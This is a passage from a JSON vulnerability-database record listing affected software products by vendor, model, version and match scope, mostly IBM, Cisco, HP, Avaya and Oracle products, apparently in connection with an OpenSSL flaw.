            "vendor": "ibm",
            "version": "7.2.0.3"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "7"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.060"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.411"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational automation framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "prime network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.2.2.2"
          },
          {
            "_id": null,
            "model": "network configuration and change management service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "data ontap smi-s agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "systems insight manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.6.0"
          },
          {
            "_id": null,
            "model": "db2 recovery expert for linux unix and windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "sterling connect:direct for hp nonstop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.2.77"
          },
          {
            "_id": null,
            "model": "cognos tm1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5.2"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "java sdk sr14",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6.0.2"
          },
          {
            "_id": null,
            "model": "link for mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.2.1.16"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "x-series xos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2.27"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.5"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp2 ltss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1"
          },
          {
            "_id": null,
            "model": "tivoli network performance manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x24087380"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.41"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip multicast qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "norman shark industrial control system protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "domino fp if3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.24"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.10"
          },
          {
            "_id": null,
            "model": "websphere process server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "prime lan management solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "command center appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "0"
          },
          {
            "_id": null,
            "model": "workload deployer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.96"
          },
          {
            "_id": null,
            "model": "jre update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "aura application server sip core",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53002.0"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.2"
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.3.0.3"
          },
          {
            "_id": null,
            "model": "netscaler gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.3"
          },
          {
            "_id": null,
            "model": "unified attendant console advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.2"
          },
          {
            "_id": null,
            "model": "cognos tm1 fp if",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5.238"
          },
          {
            "_id": null,
            "model": "ns oncommand core package",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "aura messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.036"
          },
          {
            "_id": null,
            "model": "tandberg codian isdn gw",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "32100"
          },
          {
            "_id": null,
            "model": "db2 connect unlimited edition for system i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70006.4"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "initiate master data service provider hub",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.7"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8n",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.14"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.11"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.7"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.2.0.3"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.0.820"
          },
          {
            "_id": null,
            "model": "systems insight manager sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "sametime",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.2.0.3"
          },
          {
            "_id": null,
            "model": "bcaaa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "work connect for bes10/bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.0.17483.21"
          },
          {
            "_id": null,
            "model": "jdk update24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "upward integration modules for microsoft system center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35006.4.1.8"
          },
          {
            "_id": null,
            "model": "aura messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.051"
          },
          {
            "_id": null,
            "model": "upward integration modules hardware management pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.2"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "5"
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.8.0"
          },
          {
            "_id": null,
            "model": "upward integration modules for microsoft system center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50006.4"
          },
          {
            "_id": null,
            "model": "domino if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.06"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.29"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.9"
          },
          {
            "_id": null,
            "model": "one-x client enablement services sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "content analysis system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1.0.102"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "jre update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.50"
          },
          {
            "_id": null,
            "model": "anyres live",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "blend for mac",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "java sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.15"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.195"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.034"
          },
          {
            "_id": null,
            "model": "java sdk sr16",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "upward integration modules for microsoft system center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.1"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.5.0.2"
          },
          {
            "_id": null,
            "model": "security appscan standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "xiv storage system gen3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.1"
          },
          {
            "_id": null,
            "model": "cognos insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.3.2"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1.4"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 24755 137",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.13"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.11"
          },
          {
            "_id": null,
            "model": "prime network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.1.3.3"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.5.1"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.770"
          },
          {
            "_id": null,
            "model": "operations analytics predictive insights",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.1"
          },
          {
            "_id": null,
            "model": "infosphere global name management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 04",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "malware analysis appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.2.0.8"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.4"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11 (11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "v1)"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "_id": null,
            "model": "jdk update28",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.280"
          },
          {
            "_id": null,
            "model": "domino fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.36"
          },
          {
            "_id": null,
            "model": "secure work space for bes10/bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.1.0.150360"
          },
          {
            "_id": null,
            "model": "aura session manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.1"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.1.0.6"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.6"
          },
          {
            "_id": null,
            "model": "data ontap operating in 7-mode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3.7"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "tivoli asset management for it",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.010"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1.2"
          },
          {
            "_id": null,
            "model": "ip office server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.038"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x350073800"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.11"
          },
          {
            "_id": null,
            "model": "jdk update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.9"
          },
          {
            "_id": null,
            "model": "flex system fc3171 8gb san switch and san pass-thru",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0.00"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.04"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for metrics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "phaser",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "36001.70.03.06"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.1-73"
          },
          {
            "_id": null,
            "model": "infosphere balanced warehouse c4000",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management patient hub",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "upward integration modules for vmware vsphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.4"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.0.5"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "system idataplex dx360 m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x63910"
          },
          {
            "_id": null,
            "model": "infosphere master data management server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.4"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle with sap environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "aura utility services sp7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.1.6"
          },
          {
            "_id": null,
            "model": "jre update27",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "jre update17",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "jdk update27",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.270"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.32"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.303"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.56"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10h",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.3.0.12"
          },
          {
            "_id": null,
            "model": "one-x client enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.4.0"
          },
          {
            "_id": null,
            "model": "application policy infrastructure controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.1(0.625)"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x88079030"
          },
          {
            "_id": null,
            "model": "upward integration modules for vmware vsphere",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5.3"
          },
          {
            "_id": null,
            "model": "tivoli asset discovery for distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "notes",
            "scope": "eq",
            "trust": 0.3,
